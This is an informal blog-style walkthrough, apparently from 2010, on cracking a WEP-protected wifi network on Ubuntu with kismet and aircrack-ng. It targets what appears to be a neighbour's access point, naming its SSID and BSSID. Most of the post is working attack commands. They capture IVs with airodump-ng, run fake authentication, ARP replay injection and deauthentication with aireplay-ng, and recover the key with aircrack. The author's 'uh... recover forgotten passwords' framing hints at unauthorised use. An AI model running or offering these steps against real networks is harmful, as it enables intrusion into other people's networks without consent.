Need To See What’s In The Radio Spectrum

Try something like this.

sudo iwlist scan
sudo iwlist wlan0 scan | grep '\(ESSID\|Quality\|Address\)'

I think it’s part of the iw package in Ubuntu.

Installing Tools

A great text-based interactive real time wifi scanner:

sudo apt-get install kismet

Tools to… uh… recover forgotten wifi passwords.

sudo apt-get install aircrack-ng

Run this:

sudo airmon-ng

to find out what to put in your /etc/kismet/kismet.conf file.

Example 1 (eee):
wlan0    Atheros    ath5k - [phy0]

Then put this in the source= definition:

source=ath5k,wlan0,Atheros

Example 2 (X60s):

source=iwl3945,wlan0,Intel 3945ABG

Also set:

suiduser=xed

Then run

sudo kismet

Maybe you need to run kismet_server first? Not sure. It is client/server oriented.

Pick the candidate AP:

    SSID    : 2WIRE976
    Server  : localhost:2501
    BSSID   : 00:25:3C:E0:C6:A1
    Carrier : IEEE 802.11b
    Manuf   : Unknown
    Max Rate: 18.0
    BSS Time: 1213fd23181
    Max Seen: 2000 kbps
    First   : Fri Jun 11 21:40:25 2010
    Latest  : Fri Jun 11 21:40:38 2010
    Clients : 0
    Type    : Access Point (infrastructure)
    Info    :
    Channel : 8
    Privacy : Yes
    Encrypt : WEP
    Decryptd: No
    Beacon  : 25600 (26.214400 sec)
    Packets : 10
    Data    : 0
    LLC     : 10
    Crypt   : 0
    Weak    : 0
    Dupe IV : 0
    Data    : 0B
    Signal  :
    Power   : -92 (best -90)
    Noise   : -127 (best -127)
    IP Type : None detected
    Min Loc : N/A
    Max Loc : N/A
    Range   : N/A

Try capturing some packets:

$sudo airodump-ng --bssid 00:25:3C:E0:C6:A1 --ivs -w vecinopackets --channel 8 wlan0

Try stimulating some packets to capture while capturing:

$ sudo aireplay-ng -1 0 -e 2WIRE976 -a 00:25:3C:E0:C6:A1 -h 00:DE:AD:BE:EF:01 wlan0

From the web site I’m referring to:

The one at the end lets Airodump know we only want to capture IV’s. The filename can be anything you want, and will be saved in your home directory (or whatever directory you run the command from) as filename.ivs. Copy the bssid of the wireless network from the airodump window by selecting it and pressing Shift+Ctrl+C. Open up a new terminal window so we can run aireplay to start injecting packets so our data count goes up. We want the data column in airodump to reach between 100,000 and 400,000. The more packets we have, the faster aircrack can find the WEP key. If the WEP key is 128 bits, we may need up to 1,000,000 packets. sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0

This should associate the network with the wireless connection. If it times out repeatedly, you need to be closer to the wireless router or change your interface rate by typing sudo iwconfig ath0 rate 1. Next we want to start injecting packets. sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0

At first, it will only read packets, and say 0 ARP requests and 0 packets sent. Just wait a minute or two and it will start sending packets in large quantities. If it returns text that says it has been deauthorized, press Ctrl+C and run the command again. You can try to speed things up by entering this command: sudo aireplay -0 ath0 -a BSSID ath0

Otherwise just sit back and wait. As soon as packets begin to be sent, the data field in Airodump should start flying. Wait until the desired number of packets have been recieved, then open a new terminal window and run aircrack. sudo aircrack filename.ivs

After a minute, aircrack should return the WEP key. If it doesn’t, collect more packets.